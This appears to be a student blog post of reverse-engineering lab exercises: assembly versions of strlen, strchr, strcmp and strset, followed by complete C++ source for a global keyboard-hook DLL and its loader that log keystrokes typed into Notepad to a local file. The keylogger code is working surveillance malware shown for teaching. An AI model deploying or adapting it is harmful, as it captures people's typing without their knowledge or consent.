12.24逆向工程上机作业整理

 

 

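.386
.model flat, stdcall

include kernel32.inc
includelib kernel32.lib

include msvcrt.inc
includelib msvcrt.lib

.data
szText    db    "Reverse Engineering", 0
format    db    "length = %d", 0AH, 0

.code

;-----------------------------------------------------------------------
; main: hand-written strlen() -- counts the bytes of szText up to (not
;       including) the NUL terminator and prints the count.
; ABI:   process entry point (END main); never returns, it exits through
;        ExitProcess, so callee-saved registers need not be preserved.
; Regs:  EDI = cursor into szText, EAX = running byte count
; Out:   prints "length = 19"
; Fix:   the original zeroed only AL and incremented AX, then passed AL to
;        printf, so the upper bits of EAX were never defined; the count is
;        now kept and passed as a full 32-bit value.  The unused ECX load
;        (leftover from a repne scasb variant) is gone.
;-----------------------------------------------------------------------
main PROC
    LEA EDI, szText
    XOR EAX, EAX                    ; EAX = 0 (whole register, not just AL)
RE:
    CMP BYTE PTR [EDI], 0           ; stop at the NUL terminator
    JZ  EXIT
    INC EDI                         ; next byte
    INC EAX                         ; count it (32-bit: no AL/AH split)
    JMP RE
EXIT:
    INVOKE crt_printf, addr format, EAX
    INVOKE crt_getchar
    INVOKE ExitProcess, 0
main ENDP

END main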
strlen
 1 .386
 2 .model flat, stdcall
 3 
 4 include kernel32.inc
 5 includelib kernel32.lib
 6 
 7 include msvcrt.inc
 8 includelib msvcrt.lib
 9 
10 .data
11 szText    db    "Reverse Engineering", 0
12 chr        db    'i'
13 format    db    "%d", 0AH, 0
14 
15 .code
16 
17 main PROC
18     LEA EDI, szText
19     MOV ECX,0FFFFFFFFH
20     ;LEA AX,chr
21     MOV BL,CHR
22     MOV AL,0
23     RE:
24         CMP BYTE PTR [EDI],BL
25         JZ EXIT
26         INC EDI
27         INC AL
28         JMP RE
29     EXIT:
30     
31     
32     INVOKE crt_printf, addr format, AL
33     INVOKE crt_getchar
34     INVOKE ExitProcess, 0
35 main ENDP
36 
37 END main
strchr
 1 .386
 2 .model flat, stdcall
 3 
 4 include kernel32.inc
 5 includelib kernel32.lib
 6 
 7 include msvcrt.inc
 8 includelib msvcrt.lib
 9 
10 .data
11 format        db    "%d", 0AH, 0
12 szText        db    "Reverse Engineering", 0
13 szText2        db    "Reverse Engineering", 0    ;szText==szText2
14 szText3        db    "Reverse Eng", 0            ;szText>szText3
15 szText4        db    "Reverse Engj", 0            ;szText<szText4
16 szText5        db    "Reverse Engh", 0            ;szText>szText5
17 
18 .code
19 
20 main PROC
21     LEA ESI, szText
22     ;LEA EDI, szText2    ;result=0
23     ;LEA EDI, szText3    ;result=1
24     ;LEA EDI, szText4    ;result=-1
25     LEA EDI, szText5    ;result=1
26 START:                        
27     lodsb                    ;将ds:esi的第一个字节装入寄存器AL,同时[esi]+1
28     scasb                    ;将es:edi的第一个字节和AL相减,同时[edi]+1
29     jne NOTEQ                ;为0时跳转
30     test al,al                
31     jne START            
32     xor eax,eax                ;将EAX置0
33     jmp ENDCMP                
34 NOTEQ:                      
35     mov eax,1                
36     jg ENDCMP                ;jl是小于
37     neg eax                    
38 ENDCMP:     
39     
40     
41     INVOKE crt_printf, addr format, EAX
42 
43     INVOKE crt_getchar
44     INVOKE ExitProcess, 0
45 main ENDP
46 
47 END main
strcmp
 1 .386
 2 .model flat, stdcall
 3 
 4 include kernel32.inc
 5 includelib kernel32.lib
 6 
 7 include msvcrt.inc
 8 includelib msvcrt.lib
 9 
10 .data
11 szText    db    "Reverse Engineering", 0
12 chr        db    'j'
13 
14 .code
15 
16 main PROC
17     LEA EDI, szText
18     MOV ECX,0FFFFFFFFH
19     MOV BL,CHR
20     RE:
21         CMP BYTE PTR [EDI],BL
22         JZ EXIT
23         MOV [EDI],BL
24         INC EDI
25         JMP RE
26     EXIT:
27     INVOKE crt_printf, addr szText
28 
29     INVOKE crt_getchar
30     INVOKE ExitProcess, 0
31 main ENDP
32 
33 END main
strset

#include "stdio.h"
#include "windows.h"
#include<fstream>
#include<iostream>
HINSTANCE g_hInstance = NULL;   // this DLL's module handle, captured in DllMain on DLL_PROCESS_ATTACH
HHOOK g_hHook = NULL;           // handle returned by SetWindowsHookEx in HookStart; NULL while no hook is installed
HWND g_hWnd = NULL;             // declared but never used in this file

// DLL entry point: records the module handle on process attach so that
// HookStart can pass it to SetWindowsHookEx.  lpvReserved is not used.
// Every other reason code, including DLL_PROCESS_DETACH, does nothing.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        g_hInstance = hinstDLL;
    }
    return TRUE;
}

// WH_KEYBOARD hook callback installed by HookStart.  For every key-down
// message that reaches the process this DLL was mapped into, it appends the
// translated character to a fixed log file -- but only when that process's
// executable is named notepad.exe.  The message is always handed on with
// CallNextHookEx, regardless of whether anything was logged.
//   nCode  : hook code; the nCode < 0 case is forwarded untouched
//   wParam : virtual-key code, passed to ToAscii
//   lParam : key state flags; bit 31 is 0 on press and 1 on release
// Returns whatever CallNextHookEx returns.
// NOTE(review): the log path is hard-coded, and the stream is opened and
// closed on every callback in every hooked thread; the original comments
// claimed the message is swallowed for notepad.exe, which the code below
// does not do.
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam){
    char szPath[MAX_PATH] = { 0, };     // full path of the host process image
    char *p = NULL;                     // last '\' in szPath, or NULL if none



    if (nCode >= 0) {
        std::ofstream out("D:\\reverse\\input.txt", std::ios::app);
        // output stream: the translated key is appended to the log file
        // bit 31 : 0 => press, 1 => release
        if (!(lParam & 0x80000000)) {
            GetModuleFileNameA(NULL, szPath, MAX_PATH);   // return value unchecked
            p = strrchr(szPath, '\\');
            // NOTE(review): if szPath contains no backslash (e.g. the call above
            // failed and left the buffer empty) p is NULL and p + 1 is invalid.
            // Only a host process whose executable is notepad.exe is logged.
            if (!_stricmp(p + 1, "notepad.exe")) {
                    BYTE   ks[256];
                    GetKeyboardState(ks);       // return value unchecked
                    WORD   w;                   // receives the translated character(s);
                                                // stays uninitialised if ToAscii writes nothing
                    UINT   scan;
                    scan = 0;                   // no hardware scan code supplied
                    ToAscii(wParam, scan, ks, &w, 0);   // return value (0/1/2) unchecked
                    char ch = (char)w;          // low byte only; a second byte, if any, is dropped
                    out << ch;
            }
        }
        out.close();
    }
    // Always pass the message to the next hook in the chain (required for
    // nCode < 0 and done here for the notepad.exe case as well).

    return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}

#ifdef __cplusplus
extern "C" {
#endif
    // Installs KeyboardProc as a WH_KEYBOARD hook.  With dwThreadId = 0 and
    // g_hInstance as the module, the hook applies to every thread on the
    // desktop, so the system maps this DLL into each process that receives
    // keyboard input -- the load pattern host-based monitoring keys on.
    // NOTE(review): the return value is stored without a NULL check, so a
    // failed installation is indistinguishable from "never started" in
    // HookStop.
    __declspec(dllexport) void HookStart() {
        g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstance, 0);
    }

    // Removes the hook installed by HookStart and clears g_hHook.
    // A no-op when no hook handle is held.
    __declspec(dllexport) void HookStop() {
        if (!g_hHook) {
            return;
        }
        UnhookWindowsHookEx(g_hHook);
        g_hHook = NULL;
    }
#ifdef __cplusplus
}
#endif
KeyHook.dll
#include "stdio.h"
#include "conio.h"
#include "windows.h"

#define    DEF_DLL_NAME        "KeyHook.dll"     // bare name: resolved through the LoadLibraryA search order
#define    DEF_HOOKSTART        "HookStart"      // exported (extern "C") by KeyHook.dll
#define    DEF_HOOKSTOP        "HookStop"        // exported (extern "C") by KeyHook.dll

typedef void (*PFN_HOOKSTART)();   // signature of the HookStart export
typedef void (*PFN_HOOKSTOP)();    // signature of the HookStop export

// Loads KeyHook.dll, resolves its two exports, installs the hook, waits
// until 'q' is pressed on the console, then removes the hook and unloads
// the DLL.  `void main()` is a Microsoft extension, not standard C.
// NOTE(review): neither GetProcAddress result is checked for NULL; if the
// export is missing (a different KeyHook.dll found on the search path, or
// a build without the extern "C" exports) the calls below jump through a
// null function pointer.
void main()
{
    HMODULE            hDll = NULL;
    PFN_HOOKSTART    HookStart = NULL;
    PFN_HOOKSTOP    HookStop = NULL;
    char            ch = 0;             // unused

    // KeyHook.dll
    hDll = LoadLibraryA(DEF_DLL_NAME);
    if( hDll == NULL )
    {
        printf("LoadLibrary(%s) failed!!! [%d]", DEF_DLL_NAME, GetLastError());
        return;
    }

    // export
    HookStart = (PFN_HOOKSTART)GetProcAddress(hDll, DEF_HOOKSTART);
    HookStop = (PFN_HOOKSTOP)GetProcAddress(hDll, DEF_HOOKSTOP);


    HookStart();


    // _getch reads without echo; the hook stays installed until 'q' is typed
    printf("press 'q' to quit!\n");
    while( _getch() != 'q' )    ;


    HookStop();
    
  
    FreeLibrary(hDll);
}
HookMain.cpp

 

posted @ 2017-12-24 20:07  Elpsywk